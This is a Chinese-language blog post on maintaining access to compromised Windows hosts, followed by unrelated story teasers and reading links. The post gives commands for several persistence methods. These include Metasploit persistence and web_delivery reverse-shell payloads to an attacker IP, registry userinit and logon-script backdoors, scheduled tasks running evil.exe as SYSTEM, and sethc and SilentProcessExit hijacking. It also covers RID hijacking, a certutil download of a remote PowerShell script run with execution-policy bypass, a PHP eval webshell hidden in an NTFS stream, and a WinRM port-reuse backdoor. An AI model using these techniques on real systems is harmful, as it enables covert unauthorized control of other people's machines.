Windows权限维持

msf persistence模块

向目标主机的注册表添加键值,使后门程序开机自启

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.80.145
image.png

userinit注册表后门

Userinit注册表键的作用是用户在进行登陆时,WinLogon进程运行指定的程序,可以更改它的值来添加与删除程序。具体键值:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

userinit优先于很多杀软启动,通过调用powershell(例如web_delivery模块),可以做到无文件落地,实现一定程度的免杀效果。

exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.80.167
run
image.png

Logon Scripts

优先于杀软启动,和userinit类似,但是需要在目标磁盘上留下文件,隐蔽性不佳。注册表位置:

HKEY_CURRENT_USER\Environment\

创建字符串键值: UserInitMprLogonScript
键值设置为后门的绝对路径 C:\1.bat

image.png

计划任务

  1. at命令
net time \\192.168.80.80
at \\192.168.80.80 11:34 c:/evil.exe
at \\192.168.80.80
at \\192.168.80.80 1 /del
  1. schtasks命令
  • /RL 指定运行级别(LIMITED和HIGHEST,默认LIMITED)
  • /F 强制创建
  • /RU 指定用户权限
  • /TN 指定任务名称
  • /TR 指定路径和文件名
schtasks /create /RL HIGHEST /F /RU SYSTEM /TN TestService1 /SC DAILY /ST 14:17 /TR c:/evil.exe 以system用户创建计划任务
schtasks /create /F /TN TestService1 /SC DAILY /ST 14:17 /TR c:/evil.exe 以普通用户创建计划任务
schtasks /query | findstr "Test" 查询计划任务
schtasks /run /TN TestService1 手动运行
schtasks /F /delete /TN "TestService1" 删除计划任务

映像劫持

  1. 实现效果:运行A程序,实际运行的却是B程序
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_SZ /d "C:\Users\Administrator\Desktop\a.exe" /f
image.png

此时,登录按5次shift键即可上线cs。

  1. 实现效果:关闭A程序,B程序却被打开了
  • 使用微软官方工具
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools_amd64/dbg_amd64.msi
http://download.microsoft.com/download/A/6/A/A6AC035D-DA3F-4F0C-ADA4-37C8E5D34E3D/setup/WinSDKDebuggingTools/dbg_x86.msi
image.png
  • 使用管理员用户添加注册表
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Users\Administrator\Desktop\evil.exe"

此时关闭记事本,会上线cs。

RID劫持

  • 原理
    在注册表中(HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account),把普通用户的键值修改为管理员用户的键值,以实现登录普通用户,可以使用管理员用户的权限。有些条件下我们不方便修改Administrator的密码,又得不到密码的情况下,可以使用这种方式登陆administrator的桌面环境。

  • 利用场景
    启用guest用户,修改RID;登录guest用户,获得高权限

  • msf中有对应的模块

use post/windows/manage/rid_hijack
set guest_account true
set session 1
exploit
image.png
  • 此时使用psexec登录guest用户即为system权限
image.png

影子账户

  • 原理
    通过修改注册表,克隆已有账户的权限。
    实现的效果是:net user看不到用户、计算机管理看不到用户、注册表里能看到用户,但是重启后计算机管理里还是会出现。
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1
powershell -exec bypass -File Windows-User-Clone.ps1
image.png

利用NTFS ADS流隐藏webshell

  1. 创建ads数据流文件
echo ^<?php @eval($_POST['cmd']);?^> > phpinfo.php:hidden.jpg

此时使用dir看不到该文件,使用dir /r才可以看到

image.png

或者使用notepad打开能看到文件内容

notepad phpinfo.php:hidden.jpg
image.png
  1. 利用文件包含制作webshell
    使用一个正常的php文件把ADS数据流文件include进去,即可解析一句话代码
<?php include('phpinfo.php:hidden.jpg')?>
image.png
image.png
  1. 如何删除ads数据流文件?
    直接删除宿主文件即可

组策略设置脚本启动

通过gpedit.msc组策略设置"脚本(启动/关机)"、"脚本(登录/注销)"

image.png

端口复用

在安装了IIS的Windows服务器上,通过WinRM服务,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。

  1. 配置端口复用后门
  • 对于Windows 2008系统,需要先使用命令启动WinRM服务,然后将winrm服务的端口修改为80
winrm e winrm/config/listener  查看WinRM服务的状态,未启动则返回空
winrm quickconfig -q  启动WinRM服务
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
  • 对于Windows 2012系统,WinRM服务默认启动并监听了5985端口,直接使用以下命令新增一个80端口的listener即可实现端口复用
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
  1. 连接后门
  • 首先启动WinRM服务,并设置信任连接的主机
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="192.168.80.80"}
  • 然后使用winrs命令连接远程WinRM服务执行命令
winrs -r:http://192.168.80.80 -u:administrator -p:1qaz!QAZ whoami
winrs -r:http://192.168.80.80 -u:administrator -p:1qaz!QAZ cmd 获得交互式shell
image.png

3.需要注意的点

  • WinRM服务受UAC限制,所以只有administrator可以登录,要想允许本地管理员组的其他用户登录WinRM,需要修改注册表设置。
  • 使用系统自带的winrs命令登录需要明文账号密码,很多场景下尤其是windows 2012以后,通常只能抓取到本地用户密码的hash值,这时需要使用支持NTLM hash登录的客户端进行连接。

参考:

https://www.secpulse.com/archives/103301.html
https://paper.seebug.org/1004/

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,117评论 4 360
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 66,963评论 1 290
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 107,897评论 0 240
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,805评论 0 203
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,208评论 3 286
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,535评论 1 216
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,797评论 2 311
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,493评论 0 197
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,215评论 1 241
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,477评论 2 244
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,988评论 1 258
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,325评论 2 252
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,971评论 3 235
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,055评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,807评论 0 194
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,544评论 2 271
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,455评论 2 266

推荐阅读更多精彩内容

  • ORA-00001: 违反唯一约束条件 (.) 错误说明:当在唯一索引所对应的列上键入重复值时,会触发此异常。 O...
    我想起个好名字阅读 4,865评论 0 9
  • 关于首选项和设置 首选项是您持久存储的信息,并用于配置您的应用程序。应用程序通常会向用户公开偏好设置,以便他们自定...
    nicedayCoco阅读 898评论 0 0
  • 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来...
    Littleston阅读 3,262评论 0 12
  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小沐子_IT阅读 1,962评论 0 4
  • 阅读《思维力 高效的系统思维》100% 完成阅读和xmind的整理,是最近看的书逻辑最好的,重点标注最清晰,举例最...
    灼灼2015阅读 160评论 0 0